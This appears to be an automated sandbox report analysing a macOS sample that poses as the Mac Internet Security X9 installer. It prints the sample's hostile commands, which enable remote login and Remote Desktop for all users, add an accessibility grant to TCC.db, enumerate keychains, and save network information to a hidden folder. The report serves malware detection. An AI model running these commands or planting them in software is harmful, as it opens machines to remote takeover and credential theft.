Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.378 -> queries PID 378
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.377 -> queries PID 377
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.375 -> queries PID 375
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.374 -> queries PID 374
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.373 -> queries PID 373
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.372 -> queries PID 372
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.370 -> queries PID 370
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.369 -> queries PID 369
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.368 -> queries PID 368
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.367 -> queries PID 367
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.366 -> queries PID 366
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.365 -> queries PID 365
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.364 -> queries PID 364
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.363 -> queries PID 363
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.361 -> queries PID 361
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.360 -> queries PID 360
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.359 -> queries PID 359
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.354 -> queries PID 354
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.353 -> queries PID 353
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.352 -> queries PID 352
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.351 -> queries PID 351
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.350 -> queries PID 350
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.349 -> queries PID 349
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.348 -> queries PID 348
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.347 -> queries PID 347
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.343 -> queries PID 343
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.342 -> queries PID 342
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.341 -> queries PID 341
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.340 -> queries PID 340
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.339 -> queries PID 339
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.337 -> queries PID 337
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.336 -> queries PID 336
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.335 -> queries PID 335
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.334 -> queries PID 334
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.332 -> queries PID 332
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.331 -> queries PID 331
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.330 -> queries PID 330
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.329 -> queries PID 329
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.326 -> queries PID 326
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.325 -> queries PID 325
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.324 -> queries PID 324
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.323 -> queries PID 323
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.320 -> queries PID 320
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.315 -> queries PID 315
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.314 -> queries PID 314
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.312 -> queries PID 312
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.311 -> queries PID 311
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.309 -> queries PID 309
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.308 -> queries PID 308
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.307 -> queries PID 307
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.306 -> queries PID 306
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.305 -> queries PID 305
Queries the OS software version with the shell command 'sw_vers'
Source: /usr/bin/perl5.18 (PID: 547) sw_vers executed: /usr/bin/sw_vers -productVersion
Reads hardware related sysctl values
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529) Sysctl read request: hw.availcpu (6.25)
Source: /bin/ps (PID: 647) Sysctl read request: hw.memsize (6.24)
Source: /bin/ps (PID: 664) Sysctl read request: hw.memsize (6.24)
Reads the system's hostname
Source: /bin/bash (PID: 533) Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 534) Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 536) Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 540) Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 542) Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 545) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 548) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 549) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 550) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 551) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 552) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 553) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 554) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 555) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 556) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 557) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 558) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 559) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 560) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 561) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 562) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 563) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 564) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 565) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 566) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 567) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 568) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 569) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 570) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 571) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 572) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 573) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 574) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 575) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 576) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 577) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 578) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 579) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 580) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 581) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 582) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 583) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 584) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 585) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 586) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 587) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 588) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 589) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 590) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 591) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 592) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 593) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 594) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 595) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 596) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 597) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 598) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 599) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 600) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 601) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 602) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 603) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 604) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 605) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 606) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 607) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 608) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 609) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 610) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 611) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 612) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 613) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 614) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 615) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 616) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 617) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 618) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 619) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 620) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 621) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 622) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 623) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 624) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 625) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 626) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 627) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 628) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 629) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 630) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 631) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 632) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 633) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 634) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 635) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 636) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 637) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 638) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 639) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 640) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 641) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 642) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 643) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 644) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 645) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 646) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 648) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 665) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 667) Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 671) Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 673) Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 675) Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 677) Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 679) Sysctl requested: kern.hostname (1.10)
Reads the system or server version plist file
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/sw_vers (PID: 547) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist

Lowering of HIPS / PFW / Operating System Security Settings:

Executes the "defaults" command used to read or modify user specific settings
Source: /usr/bin/perl5.18 (PID: 668) | Defaults executable: /usr/bin/defaults -> /usr/bin/defaults write /Library/Preferences/com.apple.RemoteManagement ARD_AllLocalUsers -boolean YES
Source: /usr/bin/perl5.18 (PID: 669) | Defaults executable: /usr/bin/defaults -> /usr/bin/defaults write /Library/Preferences/com.apple.RemoteManagement ARD_AllLocalUsersPrivs -integer 1073742079
Executes the "systemsetup" command used to configure System Preferences
Source: /usr/bin/sudo (PID: 543) | Systemsetup executable: /usr/sbin/systemsetup -> systemsetup -setremotelogin on
Source: /usr/bin/sudo (PID: 672) | Systemsetup executable: /usr/sbin/systemsetup -> systemsetup -setcomputersleep Never
Queries and/or modifies the SQLite TCC DB responsible for privacy and accessibility relevant settings
Source: /usr/bin/sudo (PID: 541) | TCC.db query/modification: /usr/bin/sqlite3 -> /usr/bin/sqlite3 /Library/Application Support/com.apple.TCC/TCC.db INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL)

Stealing of Sensitive Information:

Executes the "ifconfig" command used to gather network information
Source: /bin/bash (PID: 538) | Ifconfig executable: /sbin/ifconfig -> ifconfig
May steal keychain information which contains credentials
Source: /usr/bin/zip (PID: 537) | Keychain directory enumerated: /Users/henry/Library/Keychains
Source: /usr/bin/zip (PID: 537) | Keychain directory enumerated: /Library/Keychains
Writes files with ifconfig information
Source: /sbin/ifconfig (PID: 538) | File created with possible ifconfig output: /Users/henry/.calisto/network.dat


Runtime Messages

Command: open
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:
Standard Error:

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
Behavior Graph (rendered image): ID 57793, Sample FmTmHujm4o, Start date 26/07/2018, Architecture MAC, Score 100. DNS/IP info: mesu.g.aaplimg.com, 17.253.57.208, port 443 (local port 49263), APPLE-AUSTIN-AppleIncUS, United States. Process chain: xpcproxy -> Mac Internet Security X9 Installer -> bash (and bash mkdir) -> bash sudo (three instances) and 10 other processes; signature on sudo: Executes the "sudo" command used to execute a command as another user; sudo -> kickstart, perl5.18